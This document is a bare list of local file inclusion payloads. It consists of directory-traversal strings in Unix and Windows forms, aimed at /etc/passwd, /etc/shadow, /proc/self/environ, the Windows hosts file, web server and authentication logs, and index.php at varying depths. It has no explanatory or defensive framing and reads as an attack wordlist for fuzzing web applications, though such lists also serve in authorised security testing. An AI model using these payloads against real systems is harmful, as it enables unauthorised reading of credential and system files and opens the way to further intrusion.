# LFI Payloads - Local File Inclusion
../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
/etc/passwd
C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts
/etc/shadow
/etc/group
/etc/hosts
/proc/version
/proc/self/environ
/proc/self/cmdline
/var/log/apache2/access.log
/var/log/nginx/access.log
/var/log/apache/access.log
/etc/httpd/logs/access.log
/var/log/httpd/access.log
/var/log/mail.log
/var/log/vsftpd.log
/var/log/auth.log
/var/log/secure
/var/log/syslog
../index.php
../../index.php
../../../index.php
../../../../index.php
../../../../../index.php
../../../../../../index.php
../../../../../../../index.php
../../../../../../../../index.php
..\index.php
..\..\index.php
..\..\..\index.php
..\..\..\..\index.php
..\..\..\..\..\index.php
..\..\..\..\..\..\index.php
..\..\..\..\..\..\..\index.php